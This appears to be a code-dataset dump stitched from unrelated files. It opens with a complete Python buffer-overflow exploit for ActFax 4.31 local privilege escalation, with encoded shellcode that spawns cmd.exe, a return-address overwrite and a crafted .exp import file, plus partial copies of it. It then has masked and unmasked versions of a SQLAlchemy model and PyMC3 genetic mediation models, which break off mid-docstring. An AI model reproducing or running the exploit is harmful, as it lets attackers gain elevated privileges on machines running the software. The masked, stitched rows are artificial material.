'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
| sc = (
'\x89åÛÎÙuôXPYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS0CPMYJEVQHRU4LK62P0LK62DLLK0RR4LK42VH4O87QZ7VFQKOFQ9PNLGL51CLC26L10IQHO4MUQXGJBL00RPWLKPRR0LK72GLUQXPLKG03HK59P44PJ31N00PLKW8R8LK68Q031N3KSWLW9LKVTLKS1HV6QKOFQO0NLIQXOTMUQ9WP8KP2UZTS3CMKHGK3MFDSEZB68LK0XGTEQICE6LKDL0KLK68ULS1YCLKTDLKUQHPLI1TGT6DQK1KU1691J61KOM0QHQOPZLKUBZKMV1MRJEQLMMUOIEPS0S0F0BH6QLKROMWKO9EOKJPNU921FU8Y6MEOMMMKOXUWL5VSLDJMPKKM0RUUUOK775CRR2OCZC0V3KON52C2ME4FN55CHE530AA'
)
frontpad = '\x90' * 10
eip = '"\x1b@\x00'
backpad = '\x90' * 6000
buff = frontpad + sc + '\x90' * (502 - len(sc)) + eip + backpad
f = open('pwnag3.exp', 'w')
f.write(
'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
| #!/usr/bin/python
#Title: ActFax 4.31 Local Privilege Escalation Exploit
#Author: Craig Freyman (@cd1zz)
#Discovered: July 10, 2012
#Vendor Notified: June 12, 2012
#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html
#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
#[*] x86/alpha_upper succeeded with size 466 (iteration=1)
sc = (
"\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a"
"\x48\x4d\x59\x45\x50\x35\x50\x53\x30\x43\x50\x4d\x59\x4a"
"\x45\x56\x51\x48\x52\x55\x34\x4c\x4b\x36\x32\x50\x30\x4c"
"\x4b\x36\x32\x44\x4c\x4c\x4b\x30\x52\x52\x34\x4c\x4b\x34"
"\x32\x56\x48\x34\x4f\x38\x37\x51\x5a\x37\x56\x46\x51\x4b"
"\x4f\x46\x51\x39\x50\x4e\x4c\x47\x4c\x35\x31\x43\x4c\x43"
"\x32\x36\x4c\x31\x30\x49\x51\x48\x4f\x34\x4d\x55\x51\x58"
"\x47\x4a\x42\x4c\x30\x30\x52\x50\x57\x4c\x4b\x50\x52\x52"
"\x30\x4c\x4b\x37\x32\x47\x4c\x55\x51\x58\x50\x4c\x4b\x47"
"\x30\x33\x48\x4b\x35\x39\x50\x34\x34\x50\x4a\x33\x31\x4e"
"\x30\x30\x50\x4c\x4b\x57\x38\x52\x38\x4c\x4b\x36\x38\x51"
"\x30\x33\x31\x4e\x33\x4b\x53\x57\x4c\x57\x39\x4c\x4b\x56"
"\x54\x4c\x4b\x53\x31\x48\x56\x36\x51\x4b\x4f\x46\x51\x4f"
"\x30\x4e\x4c\x49\x51\x58\x4f\x54\x4d\x55\x51\x39\x57\x50"
"\x38\x4b\x50\x32\x55\x5a\x54\x53\x33\x43\x4d\x4b\x48\x47"
"\x4b\x33\x4d\x46\x44\x53\x45\x5a\x42\x36\x38\x4c\x4b\x30"
"\x58\x47\x54\x45\x51\x49\x43\x45\x36\x4c\x4b\x44\x4c\x30"
"\x4b\x4c\x4b\x36\x38\x55\x4c\x53\x31\x59\x43\x4c\x4b\x54"
"\x44\x4c\x4b\x55\x51\x48\x50\x4c\x49\x31\x54\x47\x54\x36"
"\x44\x51\x4b\x31\x4b\x55\x31\x36\x39\x31\x4a\x36\x31\x4b"
"\x4f\x4d\x30\x51\x48\x51\x4f\x50\x5a\x4c\x4b\x55\x42\x5a"
"\x4b\x4d\x56\x31\x4d\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f"
"\x49\x45\x50\x53\x30\x53\x30\x46\x30\x42\x48\x36\x51\x4c"
"\x4b\x52\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4a\x50\x4e"
"\x55\x39\x32\x31\x46\x55\x38\x59\x36\x4d\x45\x4f\x4d\x4d"
"\x4d\x4b\x4f\x58\x55\x57\x4c\x35\x56\x53\x4c\x44\x4a\x4d"
"\x50\x4b\x4b\x4d\x30\x52\x55\x55\x55\x4f\x4b\x37\x37\x35"
"\x43\x52\x52\x32\x4f\x43\x5a\x43\x30\x56\x33\x4b\x4f\x4e"
"\x35\x32\x43\x32\x4d\x45\x34\x46\x4e\x35\x35\x43\x48\x45"
"\x35\x33\x30\x41\x41")
frontpad = "\x90" * 10
eip = "\x22\x1b\x40\x00" #00401B22 RETN actfax.exe
backpad = "\x90" * 6000
buff = frontpad + sc + "\x90" * (502 - len(sc)) + eip + backpad
f = open("pwnag3.exp", "w")
f.write(
"User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
"Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
"Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
"Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
"Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
"Export Incoming\tExport-Path\tMark as Read\x0d\x0a"+buff+"\x0d\x0a")
f.close()
| null | [
0,
1,
2,
3
] |
1,688 | 6fbf64e2dc2836a54e54ee009be1d0d8d7c7037a | <mask token>
| <mask token>
class Messages(SQLMixin, SQLBase):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Messages(SQLMixin, SQLBase):
__tablename__ = 'Messages'
title = Column(Unicode(50), nullable=False)
content = Column(UnicodeText, nullable=False)
sender_id = Column(Integer, nullable=False)
receiver_id = Column(Integer, nullable=False)
| import time
from sqlalchemy import Column, Unicode, UnicodeText, Integer
from models.base_model import SQLMixin, db, SQLBase
class Messages(SQLMixin, SQLBase):
__tablename__ = 'Messages'
title = Column(Unicode(50), nullable=False)
content = Column(UnicodeText, nullable=False)
sender_id = Column(Integer, nullable=False)
receiver_id = Column(Integer, nullable=False)
| null | [
0,
1,
2,
3
] |
1,689 | 057140ef1b8db340656b75b3a06cea481e3f20af | <mask token>
class TwoStage(BayesianModel):
<mask token>
<mask token>
<mask token>
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
| <mask token>
class TwoStage(BayesianModel):
<mask token>
<mask token>
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=
self.vars['p_sigma_beta'])
phen = pm.Normal('phen', mu=phenotype_mu, sd=
phenotype_sigma, observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
